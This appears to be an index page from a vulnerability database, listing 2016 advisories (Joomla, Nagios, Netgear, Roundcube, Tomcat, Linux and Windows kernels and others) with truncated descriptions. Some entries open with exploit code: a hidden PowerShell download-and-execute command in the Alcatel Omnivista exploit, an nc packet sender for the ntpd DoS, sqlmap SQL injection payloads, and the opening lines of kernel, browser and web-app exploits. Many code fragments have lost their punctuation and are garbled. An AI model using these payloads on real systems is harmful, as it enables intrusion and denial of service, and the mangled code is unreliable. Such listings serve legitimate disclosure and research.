phpBB 2.0.23 - From Variable Tampering to SQL Injection
Case Study: Variable Tampering. Among others, RIPS reported a variable tampering issue in the style configuration page for administrators. The GET parameter install_to is used as the name of a variable. admin/admin_styles.php: $install_to = isset($HTTP_GET_VARS['install_to']) ? urldecode($HTTP_GET_VARS['install_to...
Joomla! Core Remote Privilege Escalation Vulnerability (CVE-2016-9838)
Author: p0wd3r, Knownsec 404 Security Lab. Date: 2016-12-21. 0x00 Vulnerability overview. 1. Vulnerability description: On December 13, Joomla released the 3.6.5 upgrade announcement; the upgrade fixes three security vulnerabilities, of which CVE-2016-9838 was officially rated high...
Nagios Core < 4.2.2 Curl Command Injection/Code Execution (CVE-2016-9565)
Author: p0wd3r, dawu, Knownsec 404 Security Lab. Date: 2016-12-15. 0x00 Vulnerability overview. 1. Vulnerability description: Nagios is an IT infrastructure monitoring program; recently security researcher Dawid Golunski discovered a code execution vulnerability in Nagios Core: an...
WordPress functions.php theme file Backdoor vulnerability
No description provided by source...
Netgear R6400/R7000/R8000 - Command Injection
Author: p0wd3r, dawu, Knownsec 404 Security Lab. Date: 2016-12-13. Update on 12/16: corrected an error in the original text, thanks to @k0pwn. On December 7, 2016, the foreign site exploit-db disclosed a command injection vulnerability in the NETGEAR R7000 router. For a time, each passerby hors...
Roundcube 1.2.2: Command Execution via Email
Chinese analysis: http://paper.seebug.org/138/ Author: p0wd3r, LG, Knownsec 404 Security Lab. Roundcube is a widely distributed open-source webmail software used by many organizations and companies around the globe. The mirror on SourceForge, for example, counts more than 260,000 downloads in the last 12 months [1], which is on...
Firefox - SVG cross domain cookie vulnerability (CVE-2016-9078)
Original link: http://insert-script.blogspot.jp/2016/12/firefox-svg-cross-domain-cookie.html Author: Alex Inführ. Translation: Holic, Knownsec 404 Security Lab; this article has additions and changes. Note: the vulnerability only affects Firefox versions 49 and 50; for details see the...
ImageMagick Convert Tiff Adobe Deflate Arbitrary Code Execution Vulnerability (CVE-2016-8707)
This vulnerability is present in the convert utility bundled with ImageMagick. This utility is used by many web applications to parse and convert images and other formats interchangeably. It is a very popular piece of software for this use. The vulnerability arises when attempting to deflate an...
Linux af_packet.c race condition (local root) (CVE-2016-8655)
To create AF_PACKET sockets you need CAP_NET_RAW in your network namespace, which can be acquired by unprivileged processes on systems where unprivileged namespaces are enabled (Ubuntu, Fedora, etc.). It can be triggered from within containers to compromise the host kernel. On Android, processes with...
Alcatel Lucent Omnivista 8770 Remote Code Execution (CVE-2016-9796)
No description provided by source. import socket import time import sys import os ref https://blog.malerisch.net/ Omnivista Alcatel-Lucent running on Windows Server if lensys.argv " % sys.argv0 print "eg: %s 192.168.1.246 "powershell.exe -nop -w hidden -c $g=new-object net.webclient;IEX...
NETDOIT news_detail.php parameter id SQL injection vulnerability
No description provided by source...
Wordpress Plugin Single Personal Message 1.0.3 SQL injection vulnerability
Author: sebao, Knownsec 404 Security Lab. Date: 2016-12-06. 1. Vulnerability description: Simple Personal Message is a WordPress plugin dedicated to creating a private and secure messaging system. Using Ajax operations, a group of users within the site may, between ...
Wordpress Plugin Olimometer 2.56 - SQL Injection
Vulnerable parameter: olimometer_id= Using sqlmap: Parameter: olimometer_id (GET) Type: boolean-based blind; Title: AND boolean-based blind - WHERE or HAVING clause; Payload: olimometer_id=1 AND 6227=6227 Type: AND/OR time-based blind; Title: MySQL >= 5.0.12 AND time-based blind; Payload: olimometer_id=1...
Huawei Flybox B660 router authentication bypass vulnerability
The Huawei Flybox B660 router device has an authentication bypass vulnerability. Because of the local path "./htmlcode/html/" module and the "indexdefault.asp" file, a remote unauthenticated attacker could exploit the...
Android V8 JavaScript engine arbitrary code execution vulnerability (CVE-2016-6754) (BadKernel)
For details, please refer to: https://github.com/secmob/BadKernel/blob/master/BadKernel-syscan2016.pdf function gc forvar i=0;i0.toString16; function log var str = ""; forvar i=0;i"; console.logstr; document.writestr; function setaccessaddressaddress controllerdv.setUint3234,address,true;...
New Firefox/Tor Browser 0-day vulnerability (CVE-2016-9079)
No description provided by source. var worker = new Worker'data:javascript,self.onmessage=functionmsgpostMessage"one";postMessage"two";;'; worker.postMessage"zero"; var svgns = 'http://www.w3.org/2000/svg'; worker.onmessage = functione containerA.pauseAnimations; var craftDOM = function container...
Red Hat JBoss EAP - Deserialization of Untrusted Data
1.Abstract. JBoss EAP's JMX Invoker Servlet is exposed by default on port 8080/TCP. The communication employs serialized Java objects, encapsulated in HTTP requests and responses. The server deserializes these objects without checking the object type. This behavior can be exploited to cause a...
Jenkins remoting module remote command execution vulnerability (CVE-2016-9299)
No description provided by source...
FreeBSD 8.0, 7.3 and 7.2 nfs_mount() denial of service vulnerability
No description provided by source. Local kernel exploit for FreeBSD 8.0, 7.3 and 7.2 include include include include include include include include include include include include include define BUFSIZE 272 define FSNAME "nfs" define DIRPATH "/tmp/nfs" unsigned char kernelcode =...
uSQLite 1.0.0 buffer overflow vulnerability
Vulnerability reproduction: uSQLite is a network wrapper tool for SQLite. It has a server tool, uSQLiteServer.exe, which when started listens on port 3002 and handles connections. When it receives malformed data, since the data is not validated, because of the sprintf...
emlog album plug-in kl_album_ajax_do.php SQL injection vulnerability
From http://www.leavesongs.com/PENETRATION/emlog-important-plugin-getshell.html Checking the EM album plugin source code, in kl_album_ajax_do.php we see: query("INSERT INTO " . DB_PREFIX . "kl_album (truename, fi...
Apache Tomcat Remote Code Execution (CVE-2016-8735)
Update 12/04: note that besides adding the configuration to conf/server.xml, you need to put the catalina-jmx-remote.jar and groovy-2.3.9.jar packages into the lib directory and set CATALINA_OPTS="-Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote...
SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML external entity injection vulnerability
1. It is possible that an attacker can perform a DoS attack, for example an XML entity expansion attack. 2. An SMB Relay attack is a type of man-in-the-middle attack where an attacker asks a victim to authenticate to a machine controlled by the attacker, then relays the credentials to the target. T...
ntpd remote pre-auth DoS (CVE-2016-7434)
PoC: echo "FgoAEAAAAAAAAAA2bm9uY2UsIGxhZGRyPVtdOkhyYWdzPTMyLCBsY" "WRkcj1bXTpXT1AAMiwgbGFkZHI9W106V09QAAA=" | base64 -d | nc -u -v 127.0.0.1 123 Valgrind report: $ sudo valgrind ./ntpd/ntpd -n -c /resources/ntp.conf ==5389== Memcheck, a memory error detector ==5389== Copyright (C) 2002-201...
Geovision IP Camera device weak password vulnerability
No description provided by source. #!/usr/bin/env python # coding: utf-8 from pocsuite.api.request import req from pocsuite.api.poc import register from pocsuite.api.poc import Output, POCBase class TestPOC(POCBase): vulID = '' # ssvid version = '1.0' author = 'Hcamael' vulDate = '2016-11-11' createDate...
Wordpress Plugin Answer My Question 1.3 - SQL Injection
1 - Description: $_POST['id'] is not escaped. The URL is accessible to any user. http://lenonleite.com.br/en/blog/2016/11/11/answer-my-question-1-3-plugin-for-wordpress-sql-injection/ 2 - Proof of Concept html...
Dolphin 7.3.2 authentication bypass and command execution vulnerabilities
No description provided by source. #!/usr/bin/env python # -*- coding: utf-8 -*- ''' Software : Dolphin <= 7.3.2 Auth bypass / RCE exploit Vendor : www.boonex.com Author : Ahmed sultan 0x4148 Home : 0x4148.com | https://www.linkedin.com/in/0x4148 Email : [email protected] Auth bypass trick credit goes to...
Grandstream HT701 IP analog telephone adapter admin backend weak password vulnerability
No description provided by source. #!/usr/bin/env python # coding: utf-8 from pocsuite.api.request import req from pocsuite.api.poc import register from pocsuite.api.poc import Output, POCBase import re class TestPOC(POCBase): vulID = '' # ssvid version = '1.0' author = 'Hcamael' vulDate = '2016-11-11'...
Apache Tika remote code execution vulnerability (CVE-2016-6809)
No description provided by source...
Chrome improper use of the Flash message loop leads to a UXSS vulnerability (CVE-2016-1631)
Author: Avfisher@network sharp knife. 0x00 Preface: A few days ago a buddy sent me a bug link and asked me to help explain the principle behind the vulnerability; to help him understand it, and to keep notes for future reference, I wrote this article. This...
Microsoft DirectX graphics kernel subsystem elevation of privilege vulnerability (MS16-062)
Source: Tencent Keen Security Lab official blog. Author: Daniel King @long123king. How to break Microsoft's Edge browser: Breaking Microsoft's Edge browser requires at least two basic elements: a browser-level remote code execution (RCE) and a browser sandbox escape. Browser-level remote code execution is usually achieved by exploiting a JavaScript vulnerability, while a browser sandbox escape can be done in several ways, such as user-mode logic vulnerabilities, or local privilege escalation (EoP: Escalation of Privilege) through a kernel vulnerability....
Network Scanner 4.0.0 - SEH Local Buffer Overflow
Author: k0Sh1. Vulnerability reproduction: Network Scanner is a scanning tool with a directed domain scanning function, but this function does not strictly control the loaded string, for example the Textbox length or a length check on the result; if you do not enter a domain name but instead change the...
GNU GTypist 2.9.5-2 - Local buffer overflow vulnerability
Author: k0Sh1. Vulnerability analysis: GNU GTypist is Linux text-editing software. Awkwardly, during my debugging we found that gtypist actually has CANARY and NX enabled, which means that the PoC given in the exploit should not be exploitable; this should be a denial of...
PHP 'ext/phar/phar_object.c' heap overflow vulnerability (CVE-2016-4342)
When parsing .tar/.zip/.phar files, the stack boundary condition control is not strict, which can lead to a heap overflow. Create a new empty 0-byte file "aaaa" and package it into an uncompressed "aaaa.tar" (the aaaa file size before compression is 0). Using the PharFileInfo object's getContent method to get the aaaa...
Cryptsetup Initrd LUKS root Shell privilege escalation vulnerability
Description A vulnerability in Cryptsetup, concretely in the scripts that unlock the system partition when the partition is ciphered using LUKS Linux Unified Key Setup. The disclosure of this vulnerability was presented as part of our talk "Abusing LUKS to Hack the System" in the DeepSec 2016...
Apache Shiro remote security restriction bypass vulnerability (CVE-2016-6802)
Apache Shiro before 1.3.2 allows attackers to bypass intended servlet filters and gain access by leveraging the use of a non-root servlet context path. In Shiro's path control, the attacker can bypass the filter to access a filtered path; affected versions: Shiro < 1.3.2. From the above figur...
Nginx privilege elevation vulnerability (Debian, Ubuntu distributions)
Discovered by: Dawid Golunski - dawidatlegalhackers.com - https://legalhackers.com - Release date: 15.11.2016 - Revision 1.0 I. VULNERABILITY ------------------------- Nginx Debian-based distros - Root Privilege Escalation Fixed in 1.6.2-5+deb8u3 package on Debian, and 1.10.0-0ubuntu0.16.04.3 on...
vlcms_v1.2 two SQL injection vulnerabilities
No description provided by source...
YxtCMF online classroom front-end filtering is not strict, leading to SQL injection vulnerabilities
No description provided by source...
vlcms_v1.2 arbitrary file read vulnerability
No description provided by source...
Spring Data JPA Blind SQL Injection Vulnerability
PoC for blind SQL injection bug found in Solita Webhack 2016. Founders: Niklas Särökaari, Joona Immonen Analysis: Arto Santala, Niklas Särökaari, Joona Immonen, Antti Virtanen, Michael Holopainen PoC: Antti Ahola, Antti Virtanen CVE: https://pivotal.io/security/cve-2016-6652 This has been fixed i...
e107 CMS-2.1.1 privilege elevation vulnerability
No description provided by source. $login, 'userpass' = $pass, 'userlogin' = 'Sign In'; curlsetopt$ch, CURLOPTPOST, 1; $content = curlexec$ch; if strpos$content, '?logout' === false die"Cannot login"; $data = array; $data'useradmin' = 1; $data'userperms' = 0; $data'userpassword' = md5$pass;...
Microsoft Windows Internet Explorer the animation Manager memory corruption vulnerability (MS16-132)
Exploitation: Exploitation of this vulnerability requires a user to visit a page containing specially crafted JavaScript. Users can generally be lured to visit web pages via email, instant message or links on the internet. Vulnerabilities like this are often hosted on legitimate websites which have...
Windows Local Security Authority Subsystem Service (LSASS) remote memory corruption vulnerability (MS16-137)
When an attacker sends a carefully crafted request, memory corruption in the Local Security Authority Subsystem Service (LSASS) causes a denial of service. A vulnerability in the Windows Local Security Authority Subsystem Service (LSASS) was found on Windows OS versions ranging...
Win32k elevation of privilege vulnerability (MS16-135) (CVE-2016-7255)
Multiple elevation of privilege vulnerabilities exist because Windows kernel-mode drivers do not properly handle objects in memory. An attacker who successfully exploits this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, ...
Piwik <= 2.16.0 (saveLayout) PHP object injection vulnerability
The vulnerability can be triggered through the saveLayout method defined in /plugins/Dashboard/Controller.php: 210. public function saveLayout() 211. { 212. $this->checkTokenInUrl(); 213. 214. $layout = Common::unsanitizeInputValue(Common::getRequestVar('layout')); 215. $layout = strip_tags($layout); 216...
Loopcomm WLAN AP Webserver unauthorized access vulnerability
No description provided by source...
GitLab arbitrary user authentication token leak leading to remote code execution vulnerability
Vulnerability analysis reference: http://paper.seebug.org/104/ The project export feature serializes the user objects of team members and stores them in the project.json file. This object contains the authentication_token for every user, meaning that an attacker can simply go ahead and create a project on GitLab.com, add one...
Sophos Web Appliance v4.2.1.3 remote code execution vulnerability
Multiple parameters to the web interface are unsafely handled and can be used to run operating system commands, such as: POST /index.php?c=logs HTTP/1.1 Host: redacted User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/javascript, text/html,...
GNU tar (POINTYFEATHER) extraction path bypass vulnerability
Vulnerability analysis reference: http://paper.seebug.org/103/ Overview: The GNU tar archiver can be tricked into extracting files and directories in the given destination, regardless of the path names specified on the command line. Description: The GNU tar archiver attempts to avoid path traversal attac...